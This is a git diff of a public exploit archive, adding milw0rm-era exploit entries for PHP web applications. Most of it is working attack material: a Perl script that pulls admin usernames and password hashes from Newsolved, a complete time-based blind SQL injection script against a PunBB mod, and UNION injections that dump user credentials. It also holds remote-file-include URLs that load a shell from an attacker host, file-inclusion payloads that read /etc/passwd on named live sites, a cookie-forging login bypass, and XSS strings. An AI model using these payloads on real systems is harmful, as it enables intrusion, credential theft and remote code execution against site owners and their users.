+        (my $username, my $password) = getHash($target.$bug, @$_[1]);
+        if (($username) && ($password))
+        {
+            return ($username, $password);
+        }
+    }
+    return 0;
+}
+
+sub showHelp
+{
+    print "Newsolved <= 1.1.6 Sploiter ( jmp-esp.net )\n"
+        . "Usage: $0 [options] Victim\n"
+        . "OPTIONS\n"
+        . " -i integer: Userid [1]\n"
+        . " -u string: Useragent [IE]\n"
+        . " -p string: Prefix [newsolved]\n"
+        . " -f: Force [optional]\n"
+        . " -l: Lookup [optional]\n"
+        . " -h: Help [optional]\n"
+        . "EXAMPLES\n"
+        . " ./$0 http://pentagon.gov/news/\n"
+        . " ./$0 -f -i 4 http://omnomnom.com/\n"
+        . "OTHER\n"
+        . " Magic_Quotes_GPC needs to be off\n";
+}
+
+sub showBanner
+{
+    print "  __                                          \n"
+        . " |__|.--------.-----.______.-----.-----.-----.\n"
+        . " |  ||        |  _  |______|  -__|__ --|  _  |\n"
+        . " |  ||__|__|__|   __|      |_____|_____|   __|\n"
+        . "|___|         |__|    lama  06/23/2009 |__|   \n"
+        . "Kampfgeschrei!\n\n";    
+}
+
+if ($opt{h})
+{
+    showHelp();
+    exit;
+}
+
+my $victim = shift;
+if (!($victim) || !($victim = isHost($victim)))
+{
+    showHelp();
+    exit;    
+}
+
+$opt{u} = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' if (!$opt{u});
+$opt{i} = '1' if (!$opt{i});
+$opt{p} = 'newsolved' if (!$opt{p});
+
+if (scalar(@bugs) < 1)
+{
+    print "Bugs or gtfo. Srsly.\n";
+    exit;
+}
+
+my $vulnerability = isVulnerable($victim.$bugs[0][0]);
+if ($vulnerability == 0)
+{
+    print "This doesn't look like Newsolved. Read the help, now.\n\n";
+    showHelp();
+    exit if (!$opt{f});
+}
+elsif ($vulnerability == -1)
+{
+    print "Magic_Quotes_Gpc seems to be on. Read the help, now.\n\n";
+    showHelp();
+    exit if (!$opt{f});
+}
+
+showBanner();
+(my $username, my $password) = attackTarget($victim, $opt{i});
+if ($username)
+{
+    print "Target:\t\t".isHost($victim)." ( ID: ".$opt{i}." )\n";
+    print "Username:\t$username\nPassword:\t$password\n";
+    if ($opt{l})
+    {
+        my $cleartext = searchPlaintext($password);
+        if ($cleartext)
+        {
+            print "Cleartext:\t$cleartext\n";
+        }
+        else
+        {
+            print "Cleartext:\tNot found\n";
+        }
+    }
+}
+else
+{
+    print "Unable to retrieve the password: Is the userid correct?\n";
+}
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/php/webapps/9043.txt b/platforms/php/webapps/9043.txt
index 2566bc936..b20743673 100755
--- a/platforms/php/webapps/9043.txt
+++ b/platforms/php/webapps/9043.txt
@@ -1,25 +1,25 @@
-#############################################################################################
-[+] DM Albumsâ„¢ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability
-[+] Author : Septemb0x
-[+] www.Cyber-Warrior.Org - Information Technology's World
-[+] Greetz : BARCOD3 And All Friends...
-[+] Dork : Yok Dork Mork :D
-[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
-#############################################################################################
-[+] NORMAL EXPLOIT;
-[+] http://[sitename]/[path]/template/album.php?SECURITY_FILE=http://attackersite/shell.php
-[+] WORDPRESS EXPLOIT
-[+] http://[sitename]/[path]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
-#############################################################################################
-< ---- Note ---- >
-H....R;
-Sen çok üstün zekaya sahip birisin,
-emin olbilirsin, :D
-Sql injection ile domain hackleyebilen tek lamersin, :D
-ASP'de Rfi Bulmakta Birebirsin,
-Ama Gördüğüm En hıyar Lamersin :D
-Bu Kafiyelerde Bi Tarafına Girsin ;)
-Lol H....R :D
-< ---- Note Finished ---- >
-
-# milw0rm.com [2009-06-29]
+#############################################################################################
+[+] DM Albumsâ„¢ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability
+[+] Author : Septemb0x
+[+] www.Cyber-Warrior.Org - Information Technology's World
+[+] Greetz : BARCOD3 And All Friends...
+[+] Dork : Yok Dork Mork :D
+[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
+#############################################################################################
+[+] NORMAL EXPLOIT;
+[+] http://[sitename]/[path]/template/album.php?SECURITY_FILE=http://attackersite/shell.php
+[+] WORDPRESS EXPLOIT
+[+] http://[sitename]/[path]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
+#############################################################################################
+< ---- Note ---- >
+H....R;
+Sen çok üstün zekaya sahip birisin,
+emin olbilirsin, :D
+Sql injection ile domain hackleyebilen tek lamersin, :D
+ASP'de Rfi Bulmakta Birebirsin,
+Ama Gördüğüm En hıyar Lamersin :D
+Bu Kafiyelerde Bi Tarafına Girsin ;)
+Lol H....R :D
+< ---- Note Finished ---- >
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/php/webapps/9044.txt b/platforms/php/webapps/9044.txt
index 270e5f98b..6efcf1f2d 100755
--- a/platforms/php/webapps/9044.txt
+++ b/platforms/php/webapps/9044.txt
@@ -1,24 +1,24 @@
-#############################################################################################
-[+] DM FileManager 3.9.4 Remote File Include Vulnerability
-[+] Author : Septemb0x
-[+] www.Cyber-Warrior.Org - Information Technology's World
-[+] Greetz : BARCOD3 And All Friends...
-[+] Dork : Yok Dork Mork :D
-[+] Download Script : http://uploaded.to/file/3z84ie
-[+] Product Site : http://www.dutchmonkey.com
-#############################################################################################
-[+] EXPLOIT;
-[+] http://[sitename]/[path]/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
-#############################################################################################
-< ---- Note ---- >
-H....R;
-Sen çok üstün zekaya sahip birisin,
-emin olbilirsin, :D
-Sql injection ile domain hackleyebilen tek lamersin, :D
-ASP'de Rfi Bulmakta Birebirsin,
-Ama Gördüğüm En hıyar Lamersin :D
-Bu Kafiyelerde Bi Tarafına Girsin ;)
-Lol H....R :D
-< ---- Note Finished ---- >
-
-# milw0rm.com [2009-06-29]
+#############################################################################################
+[+] DM FileManager 3.9.4 Remote File Include Vulnerability
+[+] Author : Septemb0x
+[+] www.Cyber-Warrior.Org - Information Technology's World
+[+] Greetz : BARCOD3 And All Friends...
+[+] Dork : Yok Dork Mork :D
+[+] Download Script : http://uploaded.to/file/3z84ie
+[+] Product Site : http://www.dutchmonkey.com
+#############################################################################################
+[+] EXPLOIT;
+[+] http://[sitename]/[path]/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
+#############################################################################################
+< ---- Note ---- >
+H....R;
+Sen çok üstün zekaya sahip birisin,
+emin olbilirsin, :D
+Sql injection ile domain hackleyebilen tek lamersin, :D
+ASP'de Rfi Bulmakta Birebirsin,
+Ama Gördüğüm En hıyar Lamersin :D
+Bu Kafiyelerde Bi Tarafına Girsin ;)
+Lol H....R :D
+< ---- Note Finished ---- >
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/php/webapps/9048.txt b/platforms/php/webapps/9048.txt
index 76a5a6fa0..ce613dbce 100755
--- a/platforms/php/webapps/9048.txt
+++ b/platforms/php/webapps/9048.txt
@@ -1,11 +1,11 @@
-#############################################################################################
-[+] WordPress Plugin DM Albums 1.9.2 Remote File Dislosure Vulnerability
-[+] Author : Stack
-[+] Greetz : V4 Team & Sec R1z
-[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
-#############################################################################################
-[+] Xpl :
-[+] http://[sitename]/[path]//wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/wp-content/plugins/dm-albums/
-#############################################################################################
-
-# milw0rm.com [2009-06-30]
+#############################################################################################
+[+] WordPress Plugin DM Albums 1.9.2 Remote File Dislosure Vulnerability
+[+] Author : Stack
+[+] Greetz : V4 Team & Sec R1z
+[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
+#############################################################################################
+[+] Xpl :
+[+] http://[sitename]/[path]//wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/wp-content/plugins/dm-albums/
+#############################################################################################
+
+# milw0rm.com [2009-06-30]
diff --git a/platforms/php/webapps/9049.txt b/platforms/php/webapps/9049.txt
index c1c2d3f12..2a353ca94 100755
--- a/platforms/php/webapps/9049.txt
+++ b/platforms/php/webapps/9049.txt
@@ -1,11 +1,11 @@
-#############################################################################################
-[+] DM FileManager 3.9.4 Remote File Dislosure Vulnerability
-[+] Author : Stack
-[+] Greetz : V4 Team & Sec R1z
-[+] Download Script : http://www.dutchmonkey.com/?file=products/dm-filemanager/download_response.html&download=direct
-#############################################################################################
-[+] Xpl :
-[+] http://[sitename]/[path]/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/dm-albums/
-#############################################################################################
-
-# milw0rm.com [2009-06-30]
+#############################################################################################
+[+] DM FileManager 3.9.4 Remote File Dislosure Vulnerability
+[+] Author : Stack
+[+] Greetz : V4 Team & Sec R1z
+[+] Download Script : http://www.dutchmonkey.com/?file=products/dm-filemanager/download_response.html&download=direct
+#############################################################################################
+[+] Xpl :
+[+] http://[sitename]/[path]/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/dm-albums/
+#############################################################################################
+
+# milw0rm.com [2009-06-30]
diff --git a/platforms/php/webapps/9051.txt b/platforms/php/webapps/9051.txt
index e99dd0ede..42e4f5d5b 100755
--- a/platforms/php/webapps/9051.txt
+++ b/platforms/php/webapps/9051.txt
@@ -1,21 +1,21 @@
-                             --:remote file include:--
----------------------------------                  
-script:Jax FormMailer 3.0.0
-Release:01.06.2008
--
-Author: ahmadbady
-    
------------------------------------------------------------------------
-download from:http://www.jtr.de/scripting/php/formmailer/index_eng.html
-   
------------------------------------------------------------------------
-dork:intitle:"Jax Formmailer - Administration"
--------------------------------------------
--------------------------------------------
-xpl:
-
-/path/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://site.com/shell.txt?
-
-*******************************************
-
-# milw0rm.com [2009-06-30]
+                             --:remote file include:--
+---------------------------------                  
+script:Jax FormMailer 3.0.0
+Release:01.06.2008
+-
+Author: ahmadbady
+    
+-----------------------------------------------------------------------
+download from:http://www.jtr.de/scripting/php/formmailer/index_eng.html
+   
+-----------------------------------------------------------------------
+dork:intitle:"Jax Formmailer - Administration"
+-------------------------------------------
+-------------------------------------------
+xpl:
+
+/path/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://site.com/shell.txt?
+
+*******************************************
+
+# milw0rm.com [2009-06-30]
diff --git a/platforms/php/webapps/9052.txt b/platforms/php/webapps/9052.txt
index 34545fd41..2c103e9fc 100755
--- a/platforms/php/webapps/9052.txt
+++ b/platforms/php/webapps/9052.txt
@@ -1,24 +1,24 @@
------------------:LFI:----------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------
-script       : BIGACE 2.6
-  
-download  : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip
-  
-Author     : CWD@rBe
- 
-Special Thanks : www.cyber-warrior.org
- 
-***************************************************************************************************************
-exploit:
- 
-http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len
- 
-example sites
- 
-1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
- 
-2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
- 
-****************************************************************************************************************
-
-# milw0rm.com [2009-06-30]
+-----------------:LFI:----------------------------------------------------------------------------------------
+---------------------------------------------------------------------------------------------------------------
+script       : BIGACE 2.6
+  
+download  : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip
+  
+Author     : CWD@rBe
+ 
+Special Thanks : www.cyber-warrior.org
+ 
+***************************************************************************************************************
+exploit:
+ 
+http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len
+ 
+example sites
+ 
+1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
+ 
+2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
+ 
+****************************************************************************************************************
+
+# milw0rm.com [2009-06-30]
diff --git a/platforms/php/webapps/9053.txt b/platforms/php/webapps/9053.txt
index 117d62f98..998eacf0d 100755
--- a/platforms/php/webapps/9053.txt
+++ b/platforms/php/webapps/9053.txt
@@ -1,35 +1,35 @@
-################################################################################################################
-[+] phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability
-[+] Discovered By SirGod
-[+] http://insecurity-ro.org
-[+] http://h4cky0u.org
-#################################################################################################################
-
-[+] Download Script :
-http://sourceforge.net/project/showfiles.php?group_id=116966&package_id=152150&release_id=326884
-
-[+] Insecure Cookie Handling
-
- - Vulnerable code in admin.php
-
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-if ($_COOKIE[PHPMYBCAdmin] == '') {
-if (!$_POST[login] == 'login') {
-die("Please Login:<BR><form method=post><input type=password
-name=password><input type=hidden value=login name=login><input
-type=submit></form>");
-} elseif($_POST[password] == $bcadminpass) {
-setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
-header("Location: admin.php"); } else { die("Incorrect"); }
-}
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-
- - PoC
-
-    javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";
-document.cookie = "1246371700; path=/";
-
-
-#################################################################################################################
-
-# milw0rm.com [2009-06-30]
+################################################################################################################
+[+] phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability
+[+] Discovered By SirGod
+[+] http://insecurity-ro.org
+[+] http://h4cky0u.org
+#################################################################################################################
+
+[+] Download Script :
+http://sourceforge.net/project/showfiles.php?group_id=116966&package_id=152150&release_id=326884
+
+[+] Insecure Cookie Handling
+
+ - Vulnerable code in admin.php
+
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+if ($_COOKIE[PHPMYBCAdmin] == '') {
+if (!$_POST[login] == 'login') {
+die("Please Login:<BR><form method=post><input type=password
+name=password><input type=hidden value=login name=login><input
+type=submit></form>");
+} elseif($_POST[password] == $bcadminpass) {
+setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
+header("Location: admin.php"); } else { die("Incorrect"); }
+}
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+ - PoC
+
+    javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";
+document.cookie = "1246371700; path=/";
+
+
+#################################################################################################################
+
+# milw0rm.com [2009-06-30]
diff --git a/platforms/php/webapps/9055.pl b/platforms/php/webapps/9055.pl
index 359b9f6b9..e6f84814a 100755
--- a/platforms/php/webapps/9055.pl
+++ b/platforms/php/webapps/9055.pl
@@ -1,110 +1,110 @@
-#!/usr/bin/perl
-#[0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit
-#Coded By Dante90, WaRWolFz Crew
-#Bug Discovered By: Dante90 & UltraSound, WaRWolFz Crew
-#Product: http://www.punres.org/desc.php?pid=328
-
-use strict;
-use LWP::UserAgent;
-
-use HTTP::Request::Common;
-use Time::HiRes;
-use IO::Socket;
-
-my ($Hash,$Time,$Time_Start,$Time_End,$Response);
-my($Start,$End);
-my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
-my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
-my $id  = shift or &usage;
-my $Method = HTTP::Request->new(GET => $Host);
-my $HTTP = new LWP::UserAgent;
-my $Referrer = "http://warwolfz.altervista.org/";
-my $DefaultTime = request($Referrer);
-
-sub Blind_SQL_Jnjection{
-    my ($dec,$hex) = @_;
-    return "./affiliates.php?out=-1+OR+1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${id})/*";
-}
-
-for(my $I=1; $I<=40; $I++){ #N Hash characters
-    for(my $J=0; $J<=15; $J++){ #0 -> F
-        $Time_Start = time();
-        $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
-        $Time_End = time();
-        $Time = request($Referrer);
-        refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
-        if($Time_End - $Time_Start > 6){
-            $Time = request($Referrer);
-            refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
-            if($Time_End - $Time_Start > 6){
-                syswrite(STDOUT,chr($chars[$J]));
-                $Hash .= chr($chars[$J]);
-                $Time = request($Referrer);
-                refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
-                last;
-            }
-        }
-    }
-    if($I == 1 && length $Hash < 0 && !$Hash){
-        print " * Exploit Failed                                      *\n";
-        print " ------------------------------------------------------ \n";
-        exit;
-    }
-    if($I == 40){
-        print " * Exploit Successed                                   *\n";
-        print " ------------------------------------------------------\n ";
-        system("pause");
-    }
-}
-
-sub usage{
-    system("cls");
-    {
-        print " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit\n";
-        print " ------------------------------------------------------ \n";
-        print " * USAGE:                                             *\n";
-        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
-        print " * perl name_exploit.pl [id]                          *\n";
-        print " ------------------------------------------------------ \n";
-        print " *         Powered By Dante90, WaRWolFz Crew          *\n";
-        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
-        print " ------------------------------------------------------ \n";
-    };
-    exit;
-}
-
-sub request{
-    $Referrer = $_[0];
-    $Method->referrer($Referrer);
-    $Start = Time::HiRes::time();
-    $Response = $HTTP->request($Method);
-    $Response->is_success() or die "$Host : ", $Response->message,"\n";
-    $End = Time::HiRes::time();
-    $Time = $End - $Start;
-    return $Time;
-}
-
-sub refresh{
-    system("cls");
-    {
-        print " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit\n";
-        print " ------------------------------------------------------ \n";
-        print " * USAGE:                                             *\n";
-        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
-        print " * perl name_exploit.pl [uid]                         *\n";
-        print " ------------------------------------------------------ \n";
-        print " *         Powered By Dante90, WaRWolFz Crew          *\n";
-        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
-        print " ------------------------------------------------------ \n";
-    };
-    print " * Victime Site: " . $_[0] . "\n";
-    print " * Default Time: " . $_[1] . " seconds\n";
-    print " * BruteForcing Hash: " . chr($chars[$_[2]]) . "\n";
-    print " * BruteForcing N Char Hash: " . $_[5] . "\n";
-    print " * SQL Time: " . $_[4] . " seconds\n";
-    print " * Hash: " . $_[3] . "\n";
-}
-
-#WaRWolFz Crew
-
-# milw0rm.com [2009-06-30]
+#!/usr/bin/perl
+#[0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit
+#Coded By Dante90, WaRWolFz Crew
+#Bug Discovered By: Dante90 & UltraSound, WaRWolFz Crew
+#Product: http://www.punres.org/desc.php?pid=328
+
+use strict;
+use LWP::UserAgent;
+
+use HTTP::Request::Common;
+use Time::HiRes;
+use IO::Socket;
+
+my ($Hash,$Time,$Time_Start,$Time_End,$Response);
+my($Start,$End);
+my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
+my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
+my $id  = shift or &usage;
+my $Method = HTTP::Request->new(GET => $Host);
+my $HTTP = new LWP::UserAgent;
+my $Referrer = "http://warwolfz.altervista.org/";
+my $DefaultTime = request($Referrer);
+
+sub Blind_SQL_Jnjection{
+    my ($dec,$hex) = @_;
+    return "./affiliates.php?out=-1+OR+1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${id})/*";
+}
+
+for(my $I=1; $I<=40; $I++){ #N Hash characters
+    for(my $J=0; $J<=15; $J++){ #0 -> F
+        $Time_Start = time();
+        $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
+        $Time_End = time();
+        $Time = request($Referrer);
+        refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
+        if($Time_End - $Time_Start > 6){
+            $Time = request($Referrer);
+            refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
+            if($Time_End - $Time_Start > 6){
+                syswrite(STDOUT,chr($chars[$J]));
+                $Hash .= chr($chars[$J]);
+                $Time = request($Referrer);
+                refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
+                last;
+            }
+        }
+    }
+    if($I == 1 && length $Hash < 0 && !$Hash){
+        print " * Exploit Failed                                      *\n";
+        print " ------------------------------------------------------ \n";
+        exit;
+    }
+    if($I == 40){
+        print " * Exploit Successed                                   *\n";
+        print " ------------------------------------------------------\n ";
+        system("pause");
+    }
+}
+
+sub usage{
+    system("cls");
+    {
+        print " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit\n";
+        print " ------------------------------------------------------ \n";
+        print " * USAGE:                                             *\n";
+        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
+        print " * perl name_exploit.pl [id]                          *\n";
+        print " ------------------------------------------------------ \n";
+        print " *         Powered By Dante90, WaRWolFz Crew          *\n";
+        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
+        print " ------------------------------------------------------ \n";
+    };
+    exit;
+}
+
+sub request{
+    $Referrer = $_[0];
+    $Method->referrer($Referrer);
+    $Start = Time::HiRes::time();
+    $Response = $HTTP->request($Method);
+    $Response->is_success() or die "$Host : ", $Response->message,"\n";
+    $End = Time::HiRes::time();
+    $Time = $End - $Start;
+    return $Time;
+}
+
+sub refresh{
+    system("cls");
+    {
+        print " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit\n";
+        print " ------------------------------------------------------ \n";
+        print " * USAGE:                                             *\n";
+        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
+        print " * perl name_exploit.pl [uid]                         *\n";
+        print " ------------------------------------------------------ \n";
+        print " *         Powered By Dante90, WaRWolFz Crew          *\n";
+        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
+        print " ------------------------------------------------------ \n";
+    };
+    print " * Victime Site: " . $_[0] . "\n";
+    print " * Default Time: " . $_[1] . " seconds\n";
+    print " * BruteForcing Hash: " . chr($chars[$_[2]]) . "\n";
+    print " * BruteForcing N Char Hash: " . $_[5] . "\n";
+    print " * SQL Time: " . $_[4] . " seconds\n";
+    print " * Hash: " . $_[3] . "\n";
+}
+
+#WaRWolFz Crew
+
+# milw0rm.com [2009-06-30]
diff --git a/platforms/php/webapps/9056.txt b/platforms/php/webapps/9056.txt
index 1c7f8cea1..e75757895 100755
--- a/platforms/php/webapps/9056.txt
+++ b/platforms/php/webapps/9056.txt
@@ -1,21 +1,21 @@
-######################################################################################
-#                                                                                    #
-# Author: Dante90, WaRWolFz Crew                                                     #
-# Title: [0-Day] MDPRO CWGuestBook <= v2.1 Mod Remote SQL Injection By Dante90       #
-# MSN: dante90.dmc4@hotmail.it                                                       #
-# Web: www.warwolfz.org                                                              #
-#                                                                                    #
-######################################################################################
-
-[0-Day] MDPRO CWGuestBook <= v2.1 Mod Remote SQL Injection By Dante90
-
-[code]
-http://www.victime_site.org/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14 UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2--
-[/code]
-
-Example:
-[code]
-http://www.lacinium.com/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14 UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2--
-[/code]
-
-# milw0rm.com [2009-06-30]
+######################################################################################
+#                                                                                    #
+# Author: Dante90, WaRWolFz Crew                                                     #
+# Title: [0-Day] MDPRO CWGuestBook <= v2.1 Mod Remote SQL Injection By Dante90       #
+# MSN: dante90.dmc4@hotmail.it                                                       #
+# Web: www.warwolfz.org                                                              #
+#                                                                                    #
+######################################################################################
+
+[0-Day] MDPRO CWGuestBook <= v2.1 Mod Remote SQL Injection By Dante90
+
+[code]
+http://www.victime_site.org/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14 UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2--
+[/code]
+
+Example:
+[code]
+http://www.lacinium.com/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14 UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2--
+[/code]
+
+# milw0rm.com [2009-06-30]
diff --git a/platforms/php/webapps/9057.txt b/platforms/php/webapps/9057.txt
index 9ec98ab17..dfe22a2dc 100755
--- a/platforms/php/webapps/9057.txt
+++ b/platforms/php/webapps/9057.txt
@@ -1,207 +1,207 @@
-TSEP <=0.942.02 Vulnerabilities
-http://tsep.sourceforge.net
-
-Dork: "powered by TSEP - The Search Engine Project"
-
-(c)eLwaux 30.06.2009, uasc.org.ua
-
-
-## ## ## ## ## ## 
-
-Blind SQL-Inj
-/admin/rankform.php
-
------------------------------------------------------------------------------
-23:  // Delete the contents
-24:  if ((isset ($_POST["delete"])) && (isset ($_POST["deleteRank"]))) {
-25:   $percent = $_POST['deleteRank'];
-26:   $sql_del = "DELETE FROM $db_tablename WHERE valuepercent='$percent'";
-27:  
-28:   mysql_query($sql_del);
-29:  }
------------------------------------------------------------------------------
-
-exploit (BlindSQLinj after DELETE):
-POST: delete = .
-POST: deleteRank = '{SQL}-- 
-
-exploit2 (BlindSQLinj after UPDATE):
-POST: modify = .
-POST: modifyRank = . 
-POST: display = .
-POST: comment = .
-POST: alt = .
-POST: percent = '{SQL}-- 
-
-
-
-
-## ## ## ## ## ## 
-
-SQL-Inj
-/admin/rankform.php
-
------------------------------------------------------------------------------
-54:  if ((isset ($_POST["insert"])) && (isset ($_POST["insertNewRank"]))) {
-55:   $alt           = $_POST['alt'];
-56:   $image_show    = $_POST['image_show'];
-57:   $comment       = $_POST['comment'];
-58:   $percent       = $_POST['percent'];
-59: $display       = reslash($_POST['display']);
-60:
-61: if (($percent > "0") && ($percent <= "100")) {
-62: $sql_ins = "INSERT INTO $db_tablename (alt_tag,display,valuepercent,image_show,comment)
-63:    VALUES ('$alt','$display','$percent','$image_show','$comment')";
-64:         mysql_query($sql_ins);
-65: }
-66: $sql_upd = "UPDATE $db_tablename SET image_show='$image_show'";
-67: mysql_query($sql_upd);
-68:
-69:  }
------------------------------------------------------------------------------
-
-exploit:
-POST: insertNewRank = .
-POST: insert = .
-POST: percent = 1
-POST: alt = 1',( select concat_ws(0x3a,username,passwd,email,question,answer) from tsep_users ),1,1,1);-- 
-POST: image_show = 1
-POST: comment = 1
-POST: display = 1
-then goto /admin/rankform.php and look admin name & passwd & email & question and answer
-
-
-
-## ## ## ## ## ## 
-
-LFI
-/admin/index.php
-
------------------------------------------------------------------------------
-335:  if ( isset( $_POST ) and count( $_POST ) > 0 ) {
-336:      $_GET = $_POST;
-337:  }
-338:  if ( !isset($_GET["lang"]) )
-339:   if ( !isset($_SESSION["lang"]) )
-340:   $_GET["lang"] = "en_US";
-341:   else
-342:   $_GET["lang"] = $_SESSION["lang"];
-345:  if ( $_GET["lang"] != "en_US" )
-345:   require_once( "../language/" . $_GET["lang"] . "/language.php" );
------------------------------------------------------------------------------
-
-exploit:
-GET: /admin/?lang=../{FILE.PHP}%00
-
-
-
-
-
-## ## ## ## ## ## 
-
-Blind SQL-inj
-/admin/indexoverview.php
-
------------------------------------------------------------------------------
-29: if (isset($_GET['order'])) // for userdefined search order, otherwise sort by time of entry: Title ASC
-30: { // write new values
-31: $db_tablename = $db_table_prefix."internal";
-32: $query = "UPDATE $db_tablename SET stringvalue='".$_GET['order']."' WHERE description='tsepindexovervieworder'";
-33: $result = mysql_query($query, $tsepdbconnection) or die(mysql_error());
-34: $query = "UPDATE $db_tablename SET stringvalue='".$_GET['dir']."' WHERE description='tsepindexoverviewdirection'";
-35: $result = mysql_query($query, $tsepdbconnection) or die(mysql_error());
-36: }
------------------------------------------------------------------------------
-
-exploit:
-GET: order = '+and+1=if(select+ascii(lower(substring(passwd,1,1)))>90+from+tsep_users+where+username='adminame',1,0)-- 
-
-
-
-
-
-## ## ## ## ## ## 
-
-XSS
-/admin/configuration.php
-
------------------------------------------------------------------------------
-137:     <form name="tsepconfig" id="tsepconfig" method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
-154:     <form name="frmMaxResultNew" id="frmMaxResultNew" method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
-164:     <form name="frmMaxR....ckForm" id="frmMaxResult" method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
------------------------------------------------------------------------------
-
-exploit:
-GET: /configuration.php/"><script>alert(/xss/);</script><a%20"
-
-
-
-## ## ## ## ## ## 
-
-XSS
-/admin/index.php
-
------------------------------------------------------------------------------
-97:    if ( isset( $_GET["errorMsg"] ) ) {
-100:        $html .= "            <td class=\"errorMessage\">".addslashes( $_GET["errorMsg"] )."</td>\n";
-107:        unset( $_GET["errorMsg"] );
-108:    }
------------------------------------------------------------------------------
-
-exploit:
-GET: /admin/?errorMsg=<script>alert(/xss/);</script>
-
-
-
-
-## ## ## ## ## ## 
-
-Path disk:
------------------------------------------------------------------------------
-/admin/examples/phpcrawl4tsep.php
-/admin/examples/fillwithcontent.php
-/admin/examples/urllist.php
-/include/indexingtimetaken.php
